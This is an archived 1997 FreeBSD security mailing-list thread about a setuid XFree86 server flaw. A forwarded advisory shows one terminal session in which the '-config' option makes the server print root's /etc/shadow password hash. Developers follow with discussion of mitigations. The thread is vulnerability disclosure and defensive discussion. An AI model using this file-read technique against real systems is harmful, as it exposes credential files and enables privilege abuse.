Date: Sun, 23 Nov 1997 13:20:20 -0500 (EST) From: spork <spork@super-g.com> To: David Dawes <dawes@rf900.physics.usyd.edu.au> Cc: Philippe Regnauld <regnauld@deepo.prosa.dk>, freebsd-security@FreeBSD.ORG Subject: Re: Fwd: "XFree86 insecurity" <root@SHEGG.RH1.IIT.EDU> Message-ID: <Pine.BSF.3.96.971123131801.1101A-100000@super-g.inch.com> In-Reply-To: <19971122192453.17451@rf900.physics.usyd.edu.au>
next in thread | previous in thread | raw e-mail | index | archive | help
A quick fix I already had in place from the old xterm exploits was to put
all the people that use X (well, just me) in a group and make the X
binaries with suid bits only executable by that group rather than
world-execute. While it's not truly a fix, it does limit your
vulnerability. I've yet to play with XDM...
Charles Sprickman
spork@super-g.com
----
"I'm not a prophet or a stone-age man
Just a mortal with potential of a superman
I'm living on" -DB
On Sat, 22 Nov 1997, David Dawes wrote:
> On Sat, Nov 22, 1997 at 08:23:50AM +0100, Philippe Regnauld wrote:
>
> We (XFree86) are aware of this one. I agree with the recomendation of
> removing the setuid bit and using xdm to start the Xserver, and if you
> have XFree86 on a machine where this problem is significant, you should
> consider doing this.
>
> The fix is to disable the '-config' Xserver option. This will be removed
> in our next release, and also in the next X11 release from The Open
> Group. It was only added to get around problems on OS's with small
> command line length limits, and should never have been enabled for most
> Unix-like OSs. The problem isn't XFree86-specific. It affects any
> platform using X11R6 XC/TOG code where the Xserver is installed setuid
> root (although on non-XFree86 platforms you may need to be a little more
> inventive with the use of the -config option).
>
> David
>
> >Cute one.
> >
> >-----Forwarded message from shegget <root@SHEGG.RH1.IIT.EDU>-----
> >
> >Date: Fri, 21 Nov 1997 18:35:36 +0000
> >From: shegget <root@SHEGG.RH1.IIT.EDU>
> >Subject: XFree86 insecurity
> >To: BUGTRAQ@NETSPACE.ORG
> >
> > plaguez security advisory n.10
> >
> > XFree86 insecurity
> >
> >
> >
> >
> >Program: XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)
> >
> >Version: Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
> > Other versions as well.
> >
> >OS: All
> >
> >Impact: The XFree86 servers let you specify an alternate configuration
> > file and do not check whether you have rights to read it.
> > Any user can read files with root permissions.
> >
> >
> >
> >
> >hello,
> >just a short one to tell you about this "feature" I found in all default
> >XFree86 servers...
> >
> >
> >Here it is:
> >
> >Script started on Sat Aug 23 15:32:36 1997
> >Loading /usr/lib/kbd/keytables/fr-latin1.map
> >[plaguez@plaguez plaguez]$ uname -a
> >Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
> >[plaguez@plaguez plaguez]$ ls -al /etc/shadow
> >-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow
> >[plaguez@plaguez bin]$ id
> >uid=502(plaguez) gid=500(users) groups=500(users)
> >[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
> >[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
> >Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
> >use: X [:<display>] [option]
> >-a # mouse acceleration (pixels)
> >-ac disable access control restrictions
> >-audit int set audit trail level
> >-auth file select authorization file
> >bc enable bug compatibility
> >-bs disable any backing store support
> >-c turns off key-click
> >
> >... and so on. HINT: look at the first XF86_SVGA output line.
> >
> >
> >
> >
> >
> >Patch:
> >------
> >
> >If you run xdm, you should consider removing the setuid bit of the
> >servers.
> >
> >If not, well, wait for the XFree86 Project to bring you a patch, since I'm
> >too lazy to find and fix it.
> >
> >
> >
> >
> >
> >later,
> >
> >-plaguez
> >dube0866@eurobretagne.fr
> >
> >-----End of forwarded message-----
> >
> >--
> > -- Phil
> >
> > -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
>
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.96.971123131801.1101A-100000>